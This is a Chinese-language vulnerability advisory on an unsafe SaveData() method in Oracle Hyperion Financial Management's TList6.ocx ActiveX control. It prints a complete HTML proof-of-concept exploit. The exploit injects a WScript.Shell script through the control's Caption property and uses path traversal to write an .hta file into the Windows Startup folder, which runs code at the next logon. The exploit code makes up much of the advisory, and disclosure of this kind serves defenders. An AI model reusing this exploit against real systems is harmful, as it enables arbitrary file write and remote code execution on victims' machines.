Oracle Hyperion Financial Management "TList6.ocx" ActiveX控件不安全方法漏洞
发布日期:2011-11-01
更新日期:2011-11-02
受影响系统:Oracle Oracle Hyperion Financial Management
描述:
BUGTRAQ ID:
50476
Oracle Hyperion Financial Management是综合性的、可扩展的、基于Web的国际财务集成、报告和分析的解决方案。
Oracle Hyperion Financial Management "TList6.ocx" ActiveX控件在实现上存在不安全SaveData()方法漏洞,可被攻击者利用通过使用ActiveX控件的受影响应用在计算机上创建或覆盖任意文件。
<*来源:rgod (
rgod@autistici.org)
链接:
http://retrogod.altervista.org/9sg_ohfm_adv.html
*>
测试方法:
警 告
以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!
<html><head> <meta http-equiv="content-type" content="text/html; charset=ISO-8859-1"></head><body><pre><!-- Oracle
Hyperion Financial Management 11.1.2.1.0 TList6.ocx ActiveX Control Remote Code Execution Vulnerability PoC tested against
Internet Explorer 8 Microsoft Windows 2003 r2 sp2 Binary Path: C:\WINDOWS\system32\TList6.ocx ProgID: TList.TList.6 CLSID:
{65996200-3B87-11D4-A21F-00E029189826} Safe for Initialization (Registry): True Safe for Scripting (Registry): True rgod --
> <!-- saved from url=(0014)about:internet --> <html> <object classid='clsid:65996200-3B87-11D4-A21F-
00E029189826' id='obj' /> </object> <script> obj.Caption =
">>>>>>>>>>>>>>>>><" + "SCRIPT> var x=new ActiveXObject
(\"WScript.Shell\"); x.Exec(\"CALC.EXE\"); <" +"/SCRIPT>"; obj.SaveData("..\\..\\..\\..\\..\\..\\..\\..\\..\\Documents
and Settings\\All Users\\Start Menu\\Programs\\Startup\\suntzu.hta"); </script> </pre></body></html>
建议:
厂商补丁:
Oracle
------
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:
http://www.oracle.com/technetwork/topics/security/浏览次数:2438
严重程度:0(网友投票)